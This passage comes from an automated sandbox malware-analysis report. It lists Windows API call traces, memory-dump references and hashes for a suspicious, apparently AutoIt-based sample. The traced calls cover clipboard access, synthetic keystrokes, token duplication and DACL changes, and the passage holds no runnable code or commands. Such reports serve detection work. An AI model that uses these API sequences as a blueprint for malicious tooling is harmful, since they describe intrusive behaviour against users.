               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              APIs
              • FreeLibrary.KERNEL32(?,?,007A1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 006D4F6D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID:
              • API String ID: 3664257935-0
              APIs
              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006D2DC4
                • Part of subcall function 006D6B57: _wcslen.LIBCMT ref: 006D6B6A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LongNamePath_wcslen
              • String ID:
              • API String ID: 541455249-0
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: __fread_nolock
              • String ID:
              • API String ID: 2638373210-0
              APIs
                • Part of subcall function 006D3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006D3908
                • Part of subcall function 006DD730: GetInputState.USER32 ref: 006DD807
              • SetCurrentDirectoryW.KERNEL32(?), ref: 006D2B6B
                • Part of subcall function 006D30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 006D314E
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: IconNotifyShell_$CurrentDirectoryInputState
              • String ID:
              • API String ID: 3667716007-0
              APIs
              • CreateFileW.KERNELBASE(00000000,00000000,?,00710704,?,?,00000000,?,00710704,00000000,0000000C), ref: 007103B7
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              APIs
              • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 006D1CBC
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: InfoParametersSystem
              • String ID:
              • API String ID: 3098949447-0
              APIs
              • GetTempPathW.KERNEL32(00000104,?), ref: 0072D8E9
                • Part of subcall function 006D33A7: _wcslen.LIBCMT ref: 006D33AB
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: PathTemp_wcslen
              • String ID:
              • API String ID: 1974555822-0
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              APIs
              • Sleep.KERNELBASE(000001F4), ref: 015C22B1
              Memory Dump Source
              • Source File: 00000000.00000002.2127882402.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_15c0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0076961A
              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0076965B
              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0076969F
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007696C9
              • SendMessageW.USER32 ref: 007696F2
              • GetKeyState.USER32(00000011), ref: 0076978B
              • GetKeyState.USER32(00000009), ref: 00769798
              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007697AE
              • GetKeyState.USER32(00000010), ref: 007697B8
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007697E9
              • SendMessageW.USER32 ref: 00769810
              • SendMessageW.USER32(?,00001030,?,00767E95), ref: 00769918
              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0076992E
              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00769941
              • SetCapture.USER32(?), ref: 0076994A
              • ClientToScreen.USER32(?,?), ref: 007699AF
              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007699BC
              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007699D6
              • ReleaseCapture.USER32 ref: 007699E1
              • GetCursorPos.USER32(?), ref: 00769A19
              • ScreenToClient.USER32(?,?), ref: 00769A26
              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00769A80
              • SendMessageW.USER32 ref: 00769AAE
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00769AEB
              • SendMessageW.USER32 ref: 00769B1A
              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00769B3B
              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00769B4A
              • GetCursorPos.USER32(?), ref: 00769B68
              • ScreenToClient.USER32(?,?), ref: 00769B75
              • GetParent.USER32(?), ref: 00769B93
              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00769BFA
              • SendMessageW.USER32 ref: 00769C2B
              • ClientToScreen.USER32(?,?), ref: 00769C84
              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00769CB4
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00769CDE
              • SendMessageW.USER32 ref: 00769D01
              • ClientToScreen.USER32(?,?), ref: 00769D4E
              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00769D82
                • Part of subcall function 006E9944: GetWindowLongW.USER32(?,000000EB), ref: 006E9952
              • GetWindowLongW.USER32(?,000000F0), ref: 00769E05
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
              • String ID: @GUI_DRAGID$F$p#z
              • API String ID: 3429851547-1540955567
              APIs
              • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 007648F3
              • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00764908
              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00764927
              • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0076494B
              • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0076495C
              • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0076497B
              • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 007649AE
              • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 007649D4
              • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00764A0F
              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00764A56
              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00764A7E
              • IsMenu.USER32(?), ref: 00764A97
              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00764AF2
              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00764B20
              • GetWindowLongW.USER32(?,000000F0), ref: 00764B94
              • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00764BE3
              • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00764C82
              • wsprintfW.USER32 ref: 00764CAE
              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00764CC9
              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00764CF1
              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00764D13
              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00764D33
              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00764D5A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
              • String ID: %d/%02d/%02d
              • API String ID: 4054740463-328681919
              APIs
              • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 006EF998
              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0072F474
              • IsIconic.USER32(00000000), ref: 0072F47D
              • ShowWindow.USER32(00000000,00000009), ref: 0072F48A
              • SetForegroundWindow.USER32(00000000), ref: 0072F494
              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0072F4AA
              • GetCurrentThreadId.KERNEL32 ref: 0072F4B1
              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0072F4BD
              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0072F4CE
              • AttachThreadInput.USER32(?,00000000,00000001), ref: 0072F4D6
              • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0072F4DE
              • SetForegroundWindow.USER32(00000000), ref: 0072F4E1
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0072F4F6
              • keybd_event.USER32(00000012,00000000), ref: 0072F501
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0072F50B
              • keybd_event.USER32(00000012,00000000), ref: 0072F510
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0072F519
              • keybd_event.USER32(00000012,00000000), ref: 0072F51E
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 0072F528
              • keybd_event.USER32(00000012,00000000), ref: 0072F52D
              • SetForegroundWindow.USER32(00000000), ref: 0072F530
              • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0072F557
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
              • String ID: Shell_TrayWnd
              • API String ID: 4125248594-2988720461
              • Opcode ID: 17de642866ee97a1ccacce39f5d04e374aea8e4a31b135403823bef0630b0f23
              • Instruction ID: 926c1e45b0aee2b34e01e9e6b845a478888befba4b1de5e980da59b5c3e4829e
              • Instruction Fuzzy Hash: F2319671A403187BEB216FB65C4AFBF7E7CEB44B50F204065F602E61D1C6F55D10AA64
              APIs
                • Part of subcall function 007316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0073170D
                • Part of subcall function 007316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0073173A
                • Part of subcall function 007316C3: GetLastError.KERNEL32 ref: 0073174A
              • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00731286
              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007312A8
              • CloseHandle.KERNEL32(?), ref: 007312B9
              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007312D1
              • GetProcessWindowStation.USER32 ref: 007312EA
              • SetProcessWindowStation.USER32(00000000), ref: 007312F4
              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00731310
                • Part of subcall function 007310BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007311FC), ref: 007310D4
                • Part of subcall function 007310BF: CloseHandle.KERNEL32(?,?,007311FC), ref: 007310E9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
              • String ID: $default$winsta0$Zy
              • API String ID: 22674027-3658735108
              • Opcode ID: 2b5f472f73ab489e27c1134d6687f2338412174586db7470f9c752f0e4769bc0
              • Instruction ID: 2286707e369433f30c1929e76b8c96cb9e6e2cba471c3f6a0c462a38e4463468
              • Instruction Fuzzy Hash: AB81AC71900349AFEF219FA4DC49FFE7BB9EF04700F188129F911A61A2CB798944CB65
              APIs
                • Part of subcall function 007310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00731114
                • Part of subcall function 007310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 00731120
                • Part of subcall function 007310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 0073112F
                • Part of subcall function 007310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00730B9B,?,?,?), ref: 00731136
                • Part of subcall function 007310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0073114D
              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00730BCC
              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00730C00
              • GetLengthSid.ADVAPI32(?), ref: 00730C17
              • GetAce.ADVAPI32(?,00000000,?), ref: 00730C51
              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00730C6D
              • GetLengthSid.ADVAPI32(?), ref: 00730C84
              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00730C8C
              • HeapAlloc.KERNEL32(00000000), ref: 00730C93
              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00730CB4
              • CopySid.ADVAPI32(00000000), ref: 00730CBB
              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00730CEA
              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00730D0C
              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00730D1E
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00730D45
              • HeapFree.KERNEL32(00000000), ref: 00730D4C
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00730D55
              • HeapFree.KERNEL32(00000000), ref: 00730D5C
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00730D65
              • HeapFree.KERNEL32(00000000), ref: 00730D6C
              • GetProcessHeap.KERNEL32(00000000,?), ref: 00730D78
              • HeapFree.KERNEL32(00000000), ref: 00730D7F
                • Part of subcall function 00731193: GetProcessHeap.KERNEL32(00000008,00730BB1,?,00000000,?,00730BB1,?), ref: 007311A1
                • Part of subcall function 00731193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00730BB1,?), ref: 007311A8
                • Part of subcall function 00731193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00730BB1,?), ref: 007311B7
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
              • String ID:
              • API String ID: 4175595110-0
              • Opcode ID: d0da6c846c2da9ede811e80dd3f2df1d32031d6f1a5231efb55b3de6e90706bc
              • Instruction ID: 2e4cc43748dea0ee93f3fc4515fb786a8a89af4e5da4d4779ff994940bc917d0
              • Instruction Fuzzy Hash: 13717D72A0020AABEF11DFA4DC45FEEBBB8BF04300F048555E955A7192D7B9A905CBB0
              APIs
              • OpenClipboard.USER32(0076CC08), ref: 0074EB29
              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0074EB37
              • GetClipboardData.USER32(0000000D), ref: 0074EB43
              • CloseClipboard.USER32 ref: 0074EB4F
              • GlobalLock.KERNEL32(00000000), ref: 0074EB87
              • CloseClipboard.USER32 ref: 0074EB91
              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0074EBBC
              • IsClipboardFormatAvailable.USER32(00000001), ref: 0074EBC9
              • GetClipboardData.USER32(00000001), ref: 0074EBD1
              • GlobalLock.KERNEL32(00000000), ref: 0074EBE2
              • GlobalUnlock.KERNEL32(00000000,?), ref: 0074EC22
              • IsClipboardFormatAvailable.USER32(0000000F), ref: 0074EC38
              • GetClipboardData.USER32(0000000F), ref: 0074EC44
              • GlobalLock.KERNEL32(00000000), ref: 0074EC55
              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0074EC77
              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0074EC94
              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0074ECD2
              • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0074ECF3
              • CountClipboardFormats.USER32 ref: 0074ED14
              • CloseClipboard.USER32 ref: 0074ED59
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
              • String ID:
              • API String ID: 420908878-0
              • Opcode ID: f9ad4836b8881398c805ec99b10c4ec892ae9ad04fb1793d89e9b3b448b4446d
              • Instruction ID: 26bca0bc1d2f79236c8b5b7e59c8c7fe617b200fc349f9ecedf46cbd8b36394c
              • Instruction Fuzzy Hash: E661AC742043019FD301EF24D898F3A77A5FF84724F08855EF896872A2CB79E905CBA6
              APIs
              • FindFirstFileW.KERNEL32(?,?), ref: 007469BE
              • FindClose.KERNEL32(00000000), ref: 00746A12
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00746A4E
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00746A75
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00746AB2
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00746ADF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
              • API String ID: 3830820486-3289030164
              • Opcode ID: ce5ab46fd1609299e68eb528a3760ec7fe76e7fba490e43b7a37ed0cebaf3dc8
              • Instruction ID: fe9c467129c160baf71d1a7cbb9fe03151f040d5701f3ae4040243f957447cb9
              • Instruction Fuzzy Hash: 42D173B1908340AFC754EBA4D891EABB7EDBF88704F44491EF585C7291EB74DA04CB62
              APIs
              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00749663
              • GetFileAttributesW.KERNEL32(?), ref: 007496A1
              • SetFileAttributesW.KERNEL32(?,?), ref: 007496BB
              • FindNextFileW.KERNEL32(00000000,?), ref: 007496D3
              • FindClose.KERNEL32(00000000), ref: 007496DE
              • FindFirstFileW.KERNEL32(*.*,?), ref: 007496FA
              • SetCurrentDirectoryW.KERNEL32(?), ref: 0074974A
              • SetCurrentDirectoryW.KERNEL32(00796B7C), ref: 00749768
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00749772
              • FindClose.KERNEL32(00000000), ref: 0074977F
              • FindClose.KERNEL32(00000000), ref: 0074978F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
              • String ID: *.*
              • API String ID: 1409584000-438819550
              • Opcode ID: 6a189900d562fd0f3cfdd0de180322517b7f1be12165ae9442f54888fe8bf475
              • Instruction ID: 9dd12a5f6265c9a0a3a34b12d2d3c94abe420f8161b55ac953df22588976fcbd
